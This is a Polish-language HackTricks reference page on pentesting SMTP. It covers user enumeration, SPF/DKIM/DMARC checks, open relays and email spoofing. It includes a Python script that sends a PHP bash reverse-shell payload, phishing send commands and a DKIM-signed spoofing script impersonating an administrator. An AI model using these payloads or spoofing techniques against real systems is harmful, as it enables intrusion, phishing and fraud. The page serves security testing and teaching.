mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
564 lines
28 KiB
Markdown
564 lines
28 KiB
Markdown
# 25,465,587 - Pentesting SMTP/s
|
|
|
|
{{#include ../../banners/hacktricks-training.md}}
|
|
|
|
## **Podstawowe informacje**
|
|
|
|
**Simple Mail Transfer Protocol (SMTP)** to protokół wykorzystywany w ramach zestawu TCP/IP do **wysyłania i odbierania e-maili**. Z powodu swoich ograniczeń w kolejkowaniu wiadomości po stronie odbiorcy, SMTP często stosuje się w połączeniu z **POP3 lub IMAP**. Te dodatkowe protokoły umożliwiają użytkownikom przechowywanie wiadomości na serwerze pocztowym i okresowe ich pobieranie.
|
|
|
|
W praktyce powszechnie zdarza się, że **programy e-mailowe** wykorzystują **SMTP do wysyłania e-maili**, podczas gdy korzystają z **POP3 lub IMAP do ich odbierania**. W systemach opartych na Unix, **sendmail** wyróżnia się jako najczęściej używany serwer SMTP do celów e-mailowych. Komercyjny pakiet znany jako Sendmail obejmuje serwer POP3. Ponadto, **Microsoft Exchange** zapewnia serwer SMTP i oferuje możliwość dodania wsparcia dla POP3.
|
|
|
|
**Domyślny port:** 25,465(ssl),587(ssl)
|
|
```
|
|
PORT STATE SERVICE REASON VERSION
|
|
25/tcp open smtp syn-ack Microsoft ESMTP 6.0.3790.3959
|
|
```
|
|
### EMAIL Headers
|
|
|
|
Jeśli masz możliwość **sprawić, aby ofiara wysłała ci e-mail** (na przykład za pomocą formularza kontaktowego na stronie), zrób to, ponieważ **możesz dowiedzieć się o wewnętrznej topologii** ofiary, oglądając nagłówki wiadomości.
|
|
|
|
Możesz również uzyskać e-mail z serwera SMTP, próbując **wysłać na ten serwer e-mail na nieistniejący adres** (ponieważ serwer wyśle do atakującego wiadomość NDN). Ale upewnij się, że wysyłasz e-mail z dozwolonego adresu (sprawdź politykę SPF) i że możesz odbierać wiadomości NDN.
|
|
|
|
Powinieneś również spróbować **wysłać różne treści, ponieważ możesz znaleźć bardziej interesujące informacje** w nagłówkach, takie jak: `X-Virus-Scanned: by av.domain.com`\
|
|
Powinieneś wysłać plik testowy EICAR.\
|
|
Wykrycie **AV** może pozwolić ci na wykorzystanie **znanych luk w zabezpieczeniach.**
|
|
|
|
## Basic actions
|
|
|
|
### **Banner Grabbing/Basic connection**
|
|
|
|
**SMTP:**
|
|
```bash
|
|
nc -vn <IP> 25
|
|
```
|
|
**SMTPS**:
|
|
```bash
|
|
openssl s_client -crlf -connect smtp.mailgun.org:465 #SSL/TLS without starttls command
|
|
openssl s_client -starttls smtp -crlf -connect smtp.mailgun.org:587
|
|
```
|
|
### Znajdowanie serwerów MX organizacji
|
|
```bash
|
|
dig +short mx google.com
|
|
```
|
|
### Enumeracja
|
|
```bash
|
|
nmap -p25 --script smtp-commands 10.10.10.10
|
|
nmap -p25 --script smtp-open-relay 10.10.10.10 -v
|
|
```
|
|
### NTLM Auth - Ujawnienie informacji
|
|
|
|
Jeśli serwer obsługuje autoryzację NTLM (Windows), możesz uzyskać wrażliwe informacje (wersje). Więcej informacji [**tutaj**](https://medium.com/@m8r0wn/internal-information-disclosure-using-hidden-ntlm-authentication-18de17675666).
|
|
```bash
|
|
root@kali: telnet example.com 587
|
|
220 example.com SMTP Server Banner
|
|
>> HELO
|
|
250 example.com Hello [x.x.x.x]
|
|
>> AUTH NTLM 334
|
|
NTLM supported
|
|
>> TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
|
|
334 TlRMTVNTUAACAAAACgAKADgAAAAFgooCBqqVKFrKPCMAAAAAAAAAAEgASABCAAAABgOAJQAAAA9JAEkAUwAwADEAAgAKAEkASQBTADAAMQABAAoASQBJAFMAMAAxAAQACgBJAEkAUwAwADEAAwAKAEkASQBTADAAMQAHAAgAHwMI0VPy1QEAAAAA
|
|
```
|
|
Lub **zautomatyzuj** to za pomocą wtyczki **nmap** `smtp-ntlm-info.nse`
|
|
|
|
### Nazwa wewnętrznego serwera - Ujawnienie informacji
|
|
|
|
Niektóre serwery SMTP automatycznie uzupełniają adres nadawcy, gdy polecenie "MAIL FROM" jest wydawane bez pełnego adresu, ujawniając swoją wewnętrzną nazwę:
|
|
```
|
|
220 somedomain.com Microsoft ESMTP MAIL Service, Version: Y.Y.Y.Y ready at Wed, 15 Sep 2021 12:13:28 +0200
|
|
EHLO all
|
|
250-somedomain.com Hello [x.x.x.x]
|
|
250-TURN
|
|
250-SIZE 52428800
|
|
250-ETRN
|
|
250-PIPELINING
|
|
250-DSN
|
|
250-ENHANCEDSTATUSCODES
|
|
250-8bitmime
|
|
250-BINARYMIME
|
|
250-CHUNKING
|
|
250-VRFY
|
|
250 OK
|
|
MAIL FROM: me
|
|
250 2.1.0 me@PRODSERV01.somedomain.com....Sender OK
|
|
```
|
|
### Sniffing
|
|
|
|
Sprawdź, czy możesz przechwycić jakieś hasło z pakietów do portu 25
|
|
|
|
### [Auth bruteforce](../../generic-hacking/brute-force.md#smtp)
|
|
|
|
## Enumeracja Bruteforce Nazw Użytkowników
|
|
|
|
**Uwierzytelnienie nie zawsze jest potrzebne**
|
|
|
|
### RCPT TO
|
|
```bash
|
|
$ telnet 1.1.1.1 25
|
|
Trying 1.1.1.1...
|
|
Connected to 1.1.1.1.
|
|
Escape character is '^]'.
|
|
220 myhost ESMTP Sendmail 8.9.3
|
|
HELO x
|
|
250 myhost Hello 18.28.38.48, pleased to meet you
|
|
MAIL FROM:example@domain.com
|
|
250 2.1.0 example@domain.com... Sender ok
|
|
RCPT TO:test
|
|
550 5.1.1 test... User unknown
|
|
RCPT TO:admin
|
|
550 5.1.1 admin... User unknown
|
|
RCPT TO:ed
|
|
250 2.1.5 ed... Recipient ok
|
|
```
|
|
### VRFY
|
|
```bash
|
|
$ telnet 1.1.1.1 25
|
|
Trying 1.1.1.1...
|
|
Connected to 1.1.1.1.
|
|
Escape character is '^]'.
|
|
220 myhost ESMTP Sendmail 8.9.3
|
|
HELO
|
|
501 HELO requires domain address
|
|
HELO x
|
|
250 myhost Hello 18.28.38.48, pleased to meet you
|
|
VRFY root
|
|
250 Super-User root@myhost
|
|
VRFY blah
|
|
550 blah... User unknown
|
|
```
|
|
### EXPN
|
|
```bash
|
|
$ telnet 1.1.1.1 25
|
|
Trying 1.1.1.1...
|
|
Connected to 1.1.1.1.
|
|
Escape character is '^]'.
|
|
220 myhost ESMTP Sendmail 8.9.3
|
|
HELO
|
|
501 HELO requires domain address
|
|
HELO x
|
|
EXPN test
|
|
550 5.1.1 test... User unknown
|
|
EXPN root
|
|
250 2.1.5 ed.williams@myhost
|
|
EXPN sshd
|
|
250 2.1.5 sshd privsep sshd@myhost
|
|
```
|
|
### Narzędzia automatyczne
|
|
```
|
|
Metasploit: auxiliary/scanner/smtp/smtp_enum
|
|
smtp-user-enum: smtp-user-enum -M <MODE> -u <USER> -t <IP>
|
|
Nmap: nmap --script smtp-enum-users <IP>
|
|
```
|
|
## DSN Reports
|
|
|
|
**Raporty powiadomień o statusie dostarczenia**: Jeśli wyślesz **email** do organizacji na **nieprawidłowy adres**, organizacja powiadomi, że adres był nieprawidłowy, wysyłając **wiadomość z powrotem do Ciebie**. **Nagłówki** zwróconego emaila będą **zawierać** możliwe **wrażliwe informacje** (takie jak adres IP usług pocztowych, które miały kontakt z raportami lub informacje o oprogramowaniu antywirusowym).
|
|
|
|
## [Commands](smtp-commands.md)
|
|
|
|
### Wysyłanie emaila z konsoli linux
|
|
```bash
|
|
sendEmail -t to@domain.com -f from@attacker.com -s <ip smtp> -u "Important subject" -a /tmp/malware.pdf
|
|
Reading message body from STDIN because the '-m' option was not used.
|
|
If you are manually typing in a message:
|
|
- First line must be received within 60 seconds.
|
|
- End manual input with a CTRL-D on its own line.
|
|
|
|
<phishing message>
|
|
```
|
|
|
|
```bash
|
|
swaks --to $(cat emails | tr '\n' ',' | less) --from test@sneakymailer.htb --header "Subject: test" --body "please click here http://10.10.14.42/" --server 10.10.10.197
|
|
```
|
|
### Wysyłanie wiadomości e-mail za pomocą Pythona
|
|
|
|
<details>
|
|
|
|
<summary>Kod Pythona tutaj</summary>
|
|
```python
|
|
from email.mime.multipart import MIMEMultipart
|
|
from email.mime.text import MIMEText
|
|
import smtplib
|
|
import sys
|
|
|
|
lhost = "127.0.0.1"
|
|
lport = 443
|
|
rhost = "192.168.1.1"
|
|
rport = 25 # 489,587
|
|
|
|
# create message object instance
|
|
msg = MIMEMultipart()
|
|
|
|
# setup the parameters of the message
|
|
password = ""
|
|
msg['From'] = "attacker@local"
|
|
msg['To'] = "victim@local"
|
|
msg['Subject'] = "This is not a drill!"
|
|
|
|
# payload
|
|
message = ("<?php system('bash -i >& /dev/tcp/%s/%d 0>&1'); ?>" % (lhost,lport))
|
|
|
|
print("[*] Payload is generated : %s" % message)
|
|
|
|
msg.attach(MIMEText(message, 'plain'))
|
|
server = smtplib.SMTP(host=rhost,port=rport)
|
|
|
|
if server.noop()[0] != 250:
|
|
print("[-]Connection Error")
|
|
exit()
|
|
|
|
server.starttls()
|
|
|
|
# Uncomment if log-in with authencation
|
|
# server.login(msg['From'], password)
|
|
|
|
server.sendmail(msg['From'], msg['To'], msg.as_string())
|
|
server.quit()
|
|
|
|
print("[***]successfully sent email to %s:" % (msg['To']))
|
|
```
|
|
</details>
|
|
|
|
## SMTP Smuggling
|
|
|
|
Luka SMTP Smuggling pozwala na ominięcie wszystkich zabezpieczeń SMTP (sprawdź następny rozdział, aby uzyskać więcej informacji na temat zabezpieczeń). Aby uzyskać więcej informacji na temat SMTP Smuggling, sprawdź:
|
|
|
|
|
|
{{#ref}}
|
|
smtp-smuggling.md
|
|
{{#endref}}
|
|
|
|
## Środki zaradcze przeciwko fałszowaniu wiadomości
|
|
|
|
Organizacje są chronione przed wysyłaniem nieautoryzowanych e-maili w ich imieniu poprzez stosowanie **SPF**, **DKIM** i **DMARC** z powodu łatwości fałszowania wiadomości SMTP.
|
|
|
|
**Pełny przewodnik po tych środkach zaradczych** jest dostępny pod adresem [https://seanthegeek.net/459/demystifying-dmarc/](https://seanthegeek.net/459/demystifying-dmarc/).
|
|
|
|
### SPF
|
|
|
|
> [!CAUTION]
|
|
> SPF [został "wycofany" w 2014 roku](https://aws.amazon.com/premiumsupport/knowledge-center/route53-spf-record/). Oznacza to, że zamiast tworzyć **rekord TXT** w `_spf.domain.com`, tworzysz go w `domain.com`, używając **tej samej składni**.\
|
|
> Ponadto, aby ponownie wykorzystać wcześniejsze rekordy spf, dość powszechne jest znalezienie czegoś takiego jak `"v=spf1 include:_spf.google.com ~all"`
|
|
|
|
**Framework Polityki Nadawcy** (SPF) to mechanizm, który umożliwia agentom transferu poczty (MTA) weryfikację, czy host wysyłający e-mail jest autoryzowany, poprzez zapytanie o listę autoryzowanych serwerów pocztowych zdefiniowanych przez organizacje. Lista ta, która określa adresy IP/zakresy, domeny i inne podmioty **autoryzowane do wysyłania e-maili w imieniu nazwy domeny**, zawiera różne "**Mechanizmy**" w rekordzie SPF.
|
|
|
|
#### Mechanizmy
|
|
|
|
Z [Wikipedia](https://en.wikipedia.org/wiki/Sender_Policy_Framework):
|
|
|
|
| Mechanizm | Opis |
|
|
| --------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
|
|
| ALL | Zawsze pasuje; używane do domyślnego wyniku, takiego jak `-all` dla wszystkich IP, które nie pasują do wcześniejszych mechanizmów. |
|
|
| A | Jeśli nazwa domeny ma rekord adresu (A lub AAAA), który można rozwiązać do adresu nadawcy, będzie pasować. |
|
|
| IP4 | Jeśli nadawca znajduje się w danym zakresie adresów IPv4, pasuje. |
|
|
| IP6 | Jeśli nadawca znajduje się w danym zakresie adresów IPv6, pasuje. |
|
|
| MX | Jeśli nazwa domeny ma rekord MX, który rozwiązuje się do adresu nadawcy, będzie pasować (tj. poczta pochodzi z jednego z przychodzących serwerów pocztowych domeny). |
|
|
| PTR | Jeśli nazwa domeny (rekord PTR) dla adresu klienta znajduje się w danej domenie i ta nazwa domeny rozwiązuje się do adresu klienta (potwierdzony odwrotny DNS), pasuje. Ten mechanizm jest odradzany i powinien być unikany, jeśli to możliwe. |
|
|
| EXISTS | Jeśli podana nazwa domeny rozwiązuje się do jakiegokolwiek adresu, pasuje (niezależnie od adresu, do którego się rozwiązuje). Rzadko jest używane. Wraz z językiem makr SPF oferuje bardziej złożone dopasowania, takie jak zapytania DNSBL. |
|
|
| INCLUDE | Odnosi się do polityki innej domeny. Jeśli polityka tej domeny przechodzi, ten mechanizm przechodzi. Jednak jeśli włączona polityka nie przechodzi, przetwarzanie trwa. Aby w pełni delegować do polityki innej domeny, należy użyć rozszerzenia przekierowania. |
|
|
| REDIRECT | <p>Przekierowanie to wskaźnik do innej nazwy domeny, która hostuje politykę SPF, pozwala na współdzielenie tej samej polityki SPF przez wiele domen. Jest to przydatne, gdy pracuje się z dużą ilością domen, które dzielą tę samą infrastrukturę e-mailową.</p><p>Polityka SPF domeny wskazanej w mechanizmie przekierowania będzie używana.</p> |
|
|
|
|
Możliwe jest również zidentyfikowanie **Kwalifikatorów**, które wskazują **co należy zrobić, jeśli mechanizm pasuje**. Domyślnie używany jest **kwalifikator "+"** (więc jeśli jakikolwiek mechanizm pasuje, oznacza to, że jest dozwolony).\
|
|
Zazwyczaj na końcu każdej polityki SPF zauważysz coś takiego jak: **\~all** lub **-all**. Używa się tego, aby wskazać, że **jeśli nadawca nie pasuje do żadnej polityki SPF, powinieneś oznaczyć e-mail jako nieufny (\~) lub odrzucić (-) e-mail.**
|
|
|
|
#### Kwalifikatory
|
|
|
|
Każdy mechanizm w polityce może być poprzedzony jednym z czterech kwalifikatorów, aby określić zamierzony wynik:
|
|
|
|
- **`+`**: Odpowiada wynikowi PASS. Domyślnie mechanizmy zakładają ten kwalifikator, co sprawia, że `+mx` jest równoważne `mx`.
|
|
- **`?`**: Reprezentuje wynik NEUTRAL, traktowany podobnie jak NONE (brak konkretnej polityki).
|
|
- **`~`**: Oznacza SOFTFAIL, stanowiąc kompromis między NEUTRAL a FAIL. E-maile spełniające ten wynik są zazwyczaj akceptowane, ale odpowiednio oznaczone.
|
|
- **`-`**: Oznacza FAIL, sugerując, że e-mail powinien być odrzucony.
|
|
|
|
W nadchodzącym przykładzie ilustrowana jest **polityka SPF google.com**. Zauważ włączenie polityk SPF z różnych domen w pierwszej polityce SPF:
|
|
```shell-session
|
|
dig txt google.com | grep spf
|
|
google.com. 235 IN TXT "v=spf1 include:_spf.google.com ~all"
|
|
|
|
dig txt _spf.google.com | grep spf
|
|
; <<>> DiG 9.11.3-1ubuntu1.7-Ubuntu <<>> txt _spf.google.com
|
|
;_spf.google.com. IN TXT
|
|
_spf.google.com. 235 IN TXT "v=spf1 include:_netblocks.google.com include:_netblocks2.google.com include:_netblocks3.google.com ~all"
|
|
|
|
dig txt _netblocks.google.com | grep spf
|
|
_netblocks.google.com. 1606 IN TXT "v=spf1 ip4:35.190.247.0/24 ip4:64.233.160.0/19 ip4:66.102.0.0/20 ip4:66.249.80.0/20 ip4:72.14.192.0/18 ip4:74.125.0.0/16 ip4:108.177.8.0/21 ip4:173.194.0.0/16 ip4:209.85.128.0/17 ip4:216.58.192.0/19 ip4:216.239.32.0/19 ~all"
|
|
|
|
dig txt _netblocks2.google.com | grep spf
|
|
_netblocks2.google.com. 1908 IN TXT "v=spf1 ip6:2001:4860:4000::/36 ip6:2404:6800:4000::/36 ip6:2607:f8b0:4000::/36 ip6:2800:3f0:4000::/36 ip6:2a00:1450:4000::/36 ip6:2c0f:fb50:4000::/36 ~all"
|
|
|
|
dig txt _netblocks3.google.com | grep spf
|
|
_netblocks3.google.com. 1903 IN TXT "v=spf1 ip4:172.217.0.0/19 ip4:172.217.32.0/20 ip4:172.217.128.0/19 ip4:172.217.160.0/20 ip4:172.217.192.0/19 ip4:172.253.56.0/21 ip4:172.253.112.0/20 ip4:108.177.96.0/19 ip4:35.191.0.0/16 ip4:130.211.0.0/22 ~all"
|
|
```
|
|
Tradycyjnie możliwe było podszywanie się pod dowolną nazwę domeny, która nie miała poprawnego/żadnego rekordu SPF. **Obecnie**, jeśli **email** pochodzi z **domeny bez ważnego rekordu SPF**, prawdopodobnie zostanie **odrzucony/oznaczony jako nieufny automatycznie**.
|
|
|
|
Aby sprawdzić SPF domeny, możesz użyć narzędzi online, takich jak: [https://www.kitterman.com/spf/validate.html](https://www.kitterman.com/spf/validate.html)
|
|
|
|
### DKIM (DomainKeys Identified Mail)
|
|
|
|
DKIM jest wykorzystywany do podpisywania wychodzących emaili, co umożliwia ich weryfikację przez zewnętrzne Agenty Przesyłania Poczty (MTA) poprzez pobranie publicznego klucza domeny z DNS. Ten publiczny klucz znajduje się w rekordzie TXT domeny. Aby uzyskać dostęp do tego klucza, należy znać zarówno selektor, jak i nazwę domeny.
|
|
|
|
Na przykład, aby zażądać klucza, niezbędne są nazwa domeny i selektor. Można je znaleźć w nagłówku maila `DKIM-Signature`, np. `d=gmail.com;s=20120113`.
|
|
|
|
Polecenie do pobrania tych informacji może wyglądać następująco:
|
|
```bash
|
|
dig 20120113._domainkey.gmail.com TXT | grep p=
|
|
# This command would return something like:
|
|
20120113._domainkey.gmail.com. 280 IN TXT "k=rsa\; p=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1Kd87/UeJjenpabgbFwh+eBCsSTrqmwIYYvywlbhbqoo2DymndFkbjOVIPIldNs/m40KF+yzMn1skyoxcTUGCQs8g3
|
|
```
|
|
### DMARC (Domain-based Message Authentication, Reporting & Conformance)
|
|
|
|
DMARC zwiększa bezpieczeństwo e-maili, opierając się na protokołach SPF i DKIM. Określa zasady, które kierują serwerami pocztowymi w obsłudze e-maili z określonej domeny, w tym jak radzić sobie z niepowodzeniami uwierzytelniania i gdzie wysyłać raporty o działaniach związanych z przetwarzaniem e-maili.
|
|
|
|
**Aby uzyskać rekord DMARC, musisz zapytać subdomenę \_dmarc**
|
|
```bash
|
|
# Reject
|
|
dig _dmarc.facebook.com txt | grep DMARC
|
|
_dmarc.facebook.com. 3600 IN TXT "v=DMARC1; p=reject; rua=mailto:a@dmarc.facebookmail.com; ruf=mailto:fb-dmarc@datafeeds.phishlabs.com; pct=100"
|
|
|
|
# Quarantine
|
|
dig _dmarc.google.com txt | grep DMARC
|
|
_dmarc.google.com. 300 IN TXT "v=DMARC1; p=quarantine; rua=mailto:mailauth-reports@google.com"
|
|
|
|
# None
|
|
dig _dmarc.bing.com txt | grep DMARC
|
|
_dmarc.bing.com. 3600 IN TXT "v=DMARC1; p=none; pct=100; rua=mailto:BingEmailDMARC@microsoft.com;"
|
|
```
|
|
#### DMARC tags
|
|
|
|
| Tag Name | Purpose | Sample |
|
|
| -------- | --------------------------------------------- | ------------------------------- |
|
|
| v | Wersja protokołu | v=DMARC1 |
|
|
| pct | Procent wiadomości podlegających filtrowaniu | pct=20 |
|
|
| ruf | URI raportowania dla raportów sądowych | ruf=mailto:authfail@example.com |
|
|
| rua | URI raportowania zbiorczych raportów | rua=mailto:aggrep@example.com |
|
|
| p | Polityka dla domeny organizacyjnej | p=quarantine |
|
|
| sp | Polityka dla subdomen OD | sp=reject |
|
|
| adkim | Tryb dopasowania dla DKIM | adkim=s |
|
|
| aspf | Tryb dopasowania dla SPF | aspf=r |
|
|
|
|
### **Co z subdomenami?**
|
|
|
|
**Z** [**tutaj**](https://serverfault.com/questions/322949/do-spf-records-for-primary-domain-apply-to-subdomains)**.**\
|
|
Musisz mieć oddzielne rekordy SPF dla każdej subdomeny, z której chcesz wysyłać maile.\
|
|
Poniższe informacje pierwotnie opublikowano na openspf.org, które było świetnym źródłem tego typu informacji.
|
|
|
|
> Pytanie Demon: Co z subdomenami?
|
|
>
|
|
> Jeśli otrzymam maila z pielovers.demon.co.uk, a nie ma danych SPF dla pielovers, czy powinienem cofnąć się o jeden poziom i sprawdzić SPF dla demon.co.uk? Nie. Każda subdomena w Demon to inny klient, a każdy klient może mieć swoją własną politykę. Nie miałoby sensu, aby polityka Demona dotyczyła wszystkich jego klientów domyślnie; jeśli Demon chce to zrobić, może ustawić rekordy SPF dla każdej subdomeny.
|
|
>
|
|
> Dlatego rada dla wydawców SPF jest taka: powinieneś dodać rekord SPF dla każdej subdomeny lub nazwy hosta, która ma rekord A lub MX.
|
|
>
|
|
> Strony z rekordami A lub MX wildcard powinny również mieć rekord SPF wildcard w formie: \* IN TXT "v=spf1 -all"
|
|
|
|
To ma sens - subdomena może znajdować się w zupełnie innej lokalizacji geograficznej i mieć bardzo różną definicję SPF.
|
|
|
|
### **Open Relay**
|
|
|
|
Kiedy wysyłane są e-maile, zapewnienie, że nie zostaną oznaczone jako spam, jest kluczowe. Często osiąga się to poprzez użycie **serwera relay, który jest zaufany przez odbiorcę**. Jednak powszechnym wyzwaniem jest to, że administratorzy mogą nie być w pełni świadomi, które **zakresy IP są bezpieczne do zezwolenia**. Ta niewiedza może prowadzić do błędów w konfiguracji serwera SMTP, co jest ryzykiem często identyfikowanym w ocenach bezpieczeństwa.
|
|
|
|
Obejściem, które niektórzy administratorzy stosują, aby uniknąć problemów z dostarczaniem e-maili, szczególnie w przypadku komunikacji z potencjalnymi lub obecnymi klientami, jest **zezwolenie na połączenia z dowolnego adresu IP**. Osiąga się to poprzez skonfigurowanie parametru `mynetworks` serwera SMTP, aby akceptował wszystkie adresy IP, jak pokazano poniżej:
|
|
```bash
|
|
mynetworks = 0.0.0.0/0
|
|
```
|
|
Aby sprawdzić, czy serwer pocztowy jest otwartym przekaźnikiem (co oznacza, że może przekazywać e-maile z dowolnego zewnętrznego źródła), powszechnie używane jest narzędzie `nmap`. Zawiera ono specjalny skrypt zaprojektowany do testowania tego. Polecenie do przeprowadzenia szczegółowego skanowania na serwerze (na przykład z adresem IP 10.10.10.10) na porcie 25 za pomocą `nmap` to:
|
|
```bash
|
|
nmap -p25 --script smtp-open-relay 10.10.10.10 -v
|
|
```
|
|
### **Narzędzia**
|
|
|
|
- [**https://github.com/serain/mailspoof**](https://github.com/serain/mailspoof) **Sprawdź błędy w konfiguracji SPF i DMARC**
|
|
- [**https://pypi.org/project/checkdmarc/**](https://pypi.org/project/checkdmarc/) **Automatycznie pobierz konfiguracje SPF i DMARC**
|
|
|
|
### Wyślij fałszywy e-mail
|
|
|
|
- [**https://www.mailsploit.com/index**](https://www.mailsploit.com/index)
|
|
- [**http://www.anonymailer.net/**](http://www.anonymailer.net)
|
|
- [**https://emkei.cz/**](https://emkei.cz/)
|
|
|
|
**Lub możesz użyć narzędzia:**
|
|
|
|
- [**https://github.com/magichk/magicspoofing**](https://github.com/magichk/magicspoofing)
|
|
```bash
|
|
# This will send a test email from test@victim.com to destination@gmail.com
|
|
python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com
|
|
# But you can also modify more options of the email
|
|
python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com --subject TEST --sender administrator@victim.com
|
|
```
|
|
> [!WARNING]
|
|
> Jeśli napotkasz jakikolwiek **błąd podczas używania biblioteki dkim python** do analizy klucza, śmiało użyj tego poniższego.\
|
|
> **UWAGA**: To jest tylko brudne rozwiązanie do szybkich sprawdzeń w przypadkach, gdy z jakiegoś powodu prywatny klucz openssl **nie może być analizowany przez dkim**.
|
|
>
|
|
> ```
|
|
> -----BEGIN RSA PRIVATE KEY-----
|
|
> MIICXgIBAAKBgQDdkohAIWT6mXiHpfAHF8bv2vHTDboN2dl5pZKG5ZSHCYC5Z1bt
|
|
> spr6chlrPUX71hfSkk8WxnJ1iC9Moa9sRzdjBrxPMjRDgP8p8AFdpugP5rJJXExO
|
|
> pkZcdNPvCXGYNYD86Gpous6ubn6KhUWwDD1bw2UFu53nW/AK/EE4/jeraQIDAQAB
|
|
> AoGAe31lrsht7TWH9aJISsu3torCaKyn23xlNuVO6xwdUb28Hpk327bFpXveKuS1
|
|
> koxaLqQYrEriFBtYsU8T5Dc06FQAVLpUBOn+9PcKlxPBCLvUF+/KbfHF0q1QbeZR
|
|
> fgr+E+fPxwVPxxk3i1AwCP4Cp1+bz2s58wZXlDBkWZ2YJwECQQD/f4bO2lnJz9Mq
|
|
> 1xsL3PqHlzIKh+W+yiGmQAELbgOdX4uCxMxjs5lwGSACMH2nUwXx+05RB8EM2m+j
|
|
> ZBTeqxDxAkEA3gHyUtVenuTGClgYpiwefaTbGfYadh0z2KmiVcRqWzz3hDUEWxhc
|
|
> GNtFT8wzLcmRHB4SQYUaS0Df9mpvwvdB+QJBALGv9Qci39L0j/15P7wOYMWvpwOf
|
|
> 422+kYxXcuKKDkWCTzoQt7yXCRzmvFYJdznJCZdymNLNu7q+p2lQjxsUiWECQQCI
|
|
> Ms2FP91ywYs1oWJN39c84byBKtiFCdla3Ib48y0EmFyJQTVQ5ZrqrOrSz8W+G2Do
|
|
> zRIKHCxLapt7w0SZabORAkEAxvm5pd2MNVqrqMJHbukHY1yBqwm5zVIYr75eiIDP
|
|
> K9B7U1w0CJFUk6+4Qutr2ROqKtNOff9KuNRLAOiAzH3ZbQ==
|
|
> -----END RSA PRIVATE KEY-----
|
|
> ```
|
|
|
|
**Lub możesz to zrobić ręcznie:**
|
|
|
|
{{#tabs}}
|
|
{{#tab name="PHP"}}
|
|
|
|
<pre class="language-php"><code class="lang-php"><strong># To wyśle niesigned wiadomość
|
|
</strong><strong>mail("your_email@gmail.com", "Test Subject!", "hej! To jest test", "From: administrator@victim.com");
|
|
</strong></code></pre>
|
|
|
|
{{#endtab}}
|
|
|
|
{{#tab name="Python"}}
|
|
```python
|
|
# Code from https://github.com/magichk/magicspoofing/blob/main/magicspoofmail.py
|
|
|
|
import os
|
|
import dkim #pip3 install dkimpy
|
|
import smtplib
|
|
from email.mime.multipart import MIMEMultipart
|
|
from email.mime.text import MIMEText
|
|
from email.mime.base import MIMEBase
|
|
|
|
# Set params
|
|
destination="destination@gmail.com"
|
|
sender="administrator@victim.com"
|
|
subject="Test"
|
|
message_html="""
|
|
<html>
|
|
<body>
|
|
<h3>This is a test, not a scam</h3>
|
|
<br />
|
|
</body>
|
|
</html>
|
|
"""
|
|
sender_domain=sender.split("@")[1]
|
|
|
|
# Prepare postfix
|
|
os.system("sudo sed -ri 's/(myhostname) = (.*)/\\1 = "+sender_domain+"/g' /etc/postfix/main.cf")
|
|
os.system("systemctl restart postfix")
|
|
|
|
# Generate DKIM keys
|
|
dkim_private_key_path="dkimprivatekey.pem"
|
|
os.system(f"openssl genrsa -out {dkim_private_key_path} 1024 2> /dev/null")
|
|
with open(dkim_private_key_path) as fh:
|
|
dkim_private_key = fh.read()
|
|
|
|
# Generate email
|
|
msg = MIMEMultipart("alternative")
|
|
msg.attach(MIMEText(message_html, "html"))
|
|
msg["To"] = destination
|
|
msg["From"] = sender
|
|
msg["Subject"] = subject
|
|
headers = [b"To", b"From", b"Subject"]
|
|
msg_data = msg.as_bytes()
|
|
|
|
# Sign email with dkim
|
|
## The receiver won't be able to check it, but the email will appear as signed (and therefore, more trusted)
|
|
dkim_selector="s1"
|
|
sig = dkim.sign(message=msg_data,selector=str(dkim_selector).encode(),domain=sender_domain.encode(),privkey=dkim_private_key.encode(),include_headers=headers)
|
|
msg["DKIM-Signature"] = sig[len("DKIM-Signature: ") :].decode()
|
|
msg_data = msg.as_bytes()
|
|
|
|
# Use local postfix relay to send email
|
|
smtp="127.0.0.1"
|
|
s = smtplib.SMTP(smtp)
|
|
s.sendmail(sender, [destination], msg_data)
|
|
```
|
|
{{#endtab}}
|
|
{{#endtabs}}
|
|
|
|
### **Więcej informacji**
|
|
|
|
**Znajdź więcej informacji na temat tych zabezpieczeń w** [**https://seanthegeek.net/459/demystifying-dmarc/**](https://seanthegeek.net/459/demystifying-dmarc/)
|
|
|
|
### **Inne wskaźniki phishingu**
|
|
|
|
- Wiek domeny
|
|
- Linki prowadzące do adresów IP
|
|
- Techniki manipulacji linkami
|
|
- Podejrzane (niezwykłe) załączniki
|
|
- Uszkodzona treść e-maila
|
|
- Wartości używane, które różnią się od nagłówków wiadomości
|
|
- Istnienie ważnego i zaufanego certyfikatu SSL
|
|
- Zgłoszenie strony do witryn filtrujących treści internetowe
|
|
|
|
## Ekfiltracja przez SMTP
|
|
|
|
**Jeśli możesz wysyłać dane przez SMTP** [**przeczytaj to**](../../generic-hacking/exfiltration.md#smtp)**.**
|
|
|
|
## Plik konfiguracyjny
|
|
|
|
### Postfix
|
|
|
|
Zazwyczaj, jeśli jest zainstalowany, w `/etc/postfix/master.cf` znajdują się **skrypty do wykonania** gdy na przykład nowa wiadomość jest odbierana przez użytkownika. Na przykład linia `flags=Rq user=mark argv=/etc/postfix/filtering-f ${sender} -- ${recipient}` oznacza, że `/etc/postfix/filtering` zostanie wykonane, jeśli nowa wiadomość zostanie odebrana przez użytkownika mark.
|
|
|
|
Inne pliki konfiguracyjne:
|
|
```
|
|
sendmail.cf
|
|
submit.cf
|
|
```
|
|
## Odniesienia
|
|
|
|
- [https://research.nccgroup.com/2015/06/10/username-enumeration-techniques-and-their-value/](https://research.nccgroup.com/2015/06/10/username-enumeration-techniques-and-their-value/)
|
|
- [https://www.reddit.com/r/HowToHack/comments/101it4u/what_could_hacker_do_with_misconfigured_smtp/](https://www.reddit.com/r/HowToHack/comments/101it4u/what_could_hacker_do_with_misconfigured_smtp/)
|
|
|
|
## Automatyczne polecenia HackTricks
|
|
```
|
|
Protocol_Name: SMTP #Protocol Abbreviation if there is one.
|
|
Port_Number: 25,465,587 #Comma separated if there is more than one.
|
|
Protocol_Description: Simple Mail Transfer Protocol #Protocol Abbreviation Spelled out
|
|
|
|
Entry_1:
|
|
Name: Notes
|
|
Description: Notes for SMTP
|
|
